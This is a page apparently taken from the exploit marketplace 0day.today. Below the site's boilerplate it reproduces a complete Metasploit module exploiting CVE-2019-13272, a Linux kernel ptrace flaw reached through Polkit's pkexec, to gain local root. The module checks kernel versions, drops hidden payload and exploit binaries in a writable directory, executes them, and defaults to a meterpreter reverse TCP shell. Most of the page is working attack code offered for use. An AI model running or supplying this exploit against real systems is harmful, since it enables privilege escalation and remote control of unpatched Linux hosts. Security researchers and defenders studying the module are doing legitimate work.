0day.today - Biggest Exploit Database in the World.
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn
GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Contact us
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Linux Polkit pkexec Helper PTRACE_TRACEME Local Root Exploit
Author
Risk
[Security Risk Critical
]0day-ID
Category
Date add
CVE
Platform
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Local
Rank = ExcellentRanking
include Msf::Post::File
include Msf::Post::Linux::Priv
include Msf::Post::Linux::Kernel
include Msf::Post::Linux::System
include Msf::Post::Linux::Compile
include Msf::Exploit::EXE
include Msf::Exploit::FileDropper
def initialize(info = {})
super(update_info(info,
'Name' => 'Linux Polkit pkexec helper PTRACE_TRACEME local root exploit',
'Description' => %q{
This module exploits an issue in ptrace_link in kernel/ptrace.c before Linux
kernel 5.1.17. This issue can be exploited from a Linux desktop terminal, but
not over an SSH session, as it requires execution from within the context of
a user with an active Polkit agent.
In the Linux kernel before 5.1.17, ptrace_link in kernel/ptrace.c mishandles
the recording of the credentials of a process that wants to create a ptrace
relationship, which allows local users to obtain root access by leveraging
certain scenarios with a parent-child process relationship, where a parent drops
privileges and calls execve (potentially allowing control by an attacker). One
contributing factor is an object lifetime issue (which can also cause a panic).
Another contributing factor is incorrect marking of a ptrace relationship as
privileged, which is exploitable through (for example) Polkit's pkexec helper
with PTRACE_TRACEME.
},
'License' => MSF_LICENSE,
'Author' => [
'Jann Horn', # Discovery and exploit
'bcoles', # Metasploit module
'timwr', # Metasploit module
],
'References' => [
['CVE', '2019-13272'],
['EDB', '47133'],
['PACKETSTORM', '153663'],
['URL', 'https://github.com/bcoles/kernel-exploits/tree/master/CVE-2019-13272'],
['URL', 'https://bugs.chromium.org/p/project-zero/issues/detail?id=1903'],
],
'SessionTypes' => [ 'shell', 'meterpreter' ],
'Platform' => [ 'linux' ],
'Arch' => [ ARCH_X64 ],
'Targets' => [[ 'Auto', {} ]],
'DefaultOptions' =>
{
'Payload' => 'linux/x64/meterpreter/reverse_tcp',
'PrependFork' => true,
},
'DisclosureDate' => 'Jul 4 2019'))
register_advanced_options [
OptBool.new('ForceExploit', [false, 'Override check result', false]),
OptString.new('WritableDir', [ true, 'A directory where we can write files', '/tmp' ])
]
end
def check
# Introduced in 4.10, but also backported
# Patched in 4.4.185, 4.9.185, 4.14.133, 4.19.58, 5.1.17
release = kernel_release
v = Gem::Version.new release.split('-').first
if v >= Gem::Version.new('5.1.17') || v < Gem::Version.new('3')
vprint_error "Kernel version #{release} is not vulnerable"
return CheckCode::Safe
end
vprint_good "Kernel version #{release} appears to be vulnerable"
unless command_exists? 'pkexec'
vprint_error 'pkexec is not installed'
return CheckCode::Safe
end
vprint_good 'pkexec is installed'
arch = kernel_hardware
unless arch.include? 'x86_64'
vprint_error "System architecture #{arch} is not supported"
return CheckCode::Safe
end
vprint_good "System architecture #{arch} is supported"
loginctl_output = cmd_exec('loginctl --no-ask-password show-session "$XDG_SESSION_ID" | grep Remote')
if loginctl_output =~ /Remote=yes/
print_warning 'This is exploit requires a valid policykit session (it cannot be executed over ssh)'
return CheckCode::Safe
end
CheckCode::Appears
end
def exploit
if is_root? && !datastore['ForceExploit']
fail_with Failure::BadConfig, 'Session already has root privileges. Set ForceExploit to override.'
end
unless check == CheckCode::Appears
unless datastore['ForceExploit']
fail_with Failure::NotVulnerable, 'Target is not vulnerable. Set ForceExploit to override.'
end
print_warning 'Target does not appear to be vulnerable'
end
unless writable? datastore['WritableDir']
fail_with Failure::BadConfig, "#{datastore['WritableDir']} is not writable"
end
payload_file = "#{datastore['WritableDir']}/.#{Rex::Text.rand_text_alpha_lower(6..12)}"
upload_and_chmodx(payload_file, generate_payload_exe)
register_file_for_cleanup(payload_file)
exploit_file = "#{datastore['WritableDir']}/.#{Rex::Text.rand_text_alpha_lower(6..12)}"
if live_compile?
vprint_status 'Live compiling exploit on system...'
upload_and_compile exploit_file, exploit_data('CVE-2019-13272', 'poc.c')
else
vprint_status 'Dropping pre-compiled exploit on system...'
upload_and_chmodx exploit_file, exploit_data('CVE-2019-13272', 'exploit')
end
register_file_for_cleanup(exploit_file)
print_status("Executing exploit '#{exploit_file}'")
result = cmd_exec("echo #{payload_file} | #{exploit_file}")
print_status("Exploit result:\n#{result}")
end
end
# 0day.today [2024-11-16] #